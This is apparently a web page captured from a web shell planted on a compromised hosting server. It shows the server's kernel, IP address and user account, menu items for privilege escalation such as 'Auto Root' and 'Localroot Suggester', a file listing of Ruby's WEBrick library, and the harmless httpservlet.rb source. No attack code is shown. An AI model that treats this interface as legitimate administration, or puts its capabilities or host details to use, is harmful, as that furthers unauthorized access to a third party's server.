Linux velvet.gennetworks.in 4.18.0-553.83.1.lve.el8.x86_64 #1 SMP Wed Nov 12 10:04:12 UTC 2025 x86_64
LiteSpeed
Server IP : 161.129.70.235 & Your IP : 216.73.216.5
Domains :
Cant Read [ /etc/named.conf ]
User : virtueex
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby22 /
lib64 /
ruby /
2.2.0 /
webrick /
Delete
Unzip
Name
Size
Permission
Date
Action
httpauth
[ DIR ]
drwxr-xr-x
2026-02-18 15:11
httpservlet
[ DIR ]
drwxr-xr-x
2026-02-18 15:11
accesslog.rb
4.31
KB
-rw-r--r--
2013-12-11 09:28
cgi.rb
7.97
KB
-rw-r--r--
2013-01-26 06:42
compat.rb
912
B
-rw-r--r--
2013-12-06 07:40
config.rb
5.56
KB
-rw-r--r--
2013-01-26 06:42
cookie.rb
3.88
KB
-rw-r--r--
2013-01-26 08:01
htmlutils.rb
680
B
-rw-r--r--
2013-05-20 07:10
httpauth.rb
3.33
KB
-rw-r--r--
2011-05-11 05:07
httpproxy.rb
9.59
KB
-rw-r--r--
2014-08-08 11:04
httprequest.rb
14.78
KB
-rw-r--r--
2018-03-28 20:17
httpresponse.rb
11.83
KB
-rw-r--r--
2018-03-28 20:20
https.rb
1.87
KB
-rw-r--r--
2013-01-26 06:42
httpserver.rb
7.71
KB
-rw-r--r--
2014-05-08 06:47
httpservlet.rb
669
B
-rw-r--r--
2009-10-02 16:15
httpstatus.rb
5.16
KB
-rw-r--r--
2017-09-14 17:07
httputils.rb
12.71
KB
-rw-r--r--
2013-05-20 07:10
httpversion.rb
1.57
KB
-rw-r--r--
2013-01-26 06:42
log.rb
3.96
KB
-rw-r--r--
2017-09-14 17:07
server.rb
9.39
KB
-rw-r--r--
2014-11-10 16:35
ssl.rb
6.69
KB
-rw-r--r--
2014-11-10 16:35
utils.rb
5.86
KB
-rw-r--r--
2014-07-02 11:56
version.rb
384
B
-rw-r--r--
2013-01-26 06:42
Save
Rename
# # httpservlet.rb -- HTTPServlet Utility File # # Author: IPR -- Internet Programming with Ruby -- writers # Copyright (c) 2000, 2001 TAKAHASHI Masayoshi, GOTOU Yuuzou # Copyright (c) 2002 Internet Programming with Ruby writers. All rights # reserved. # # $IPR: httpservlet.rb,v 1.21 2003/02/23 12:24:46 gotoyuzo Exp $ require 'webrick/httpservlet/abstract' require 'webrick/httpservlet/filehandler' require 'webrick/httpservlet/cgihandler' require 'webrick/httpservlet/erbhandler' require 'webrick/httpservlet/prochandler' module WEBrick module HTTPServlet FileHandler.add_handler("cgi", CGIHandler) FileHandler.add_handler("rhtml", ERBHandler) end end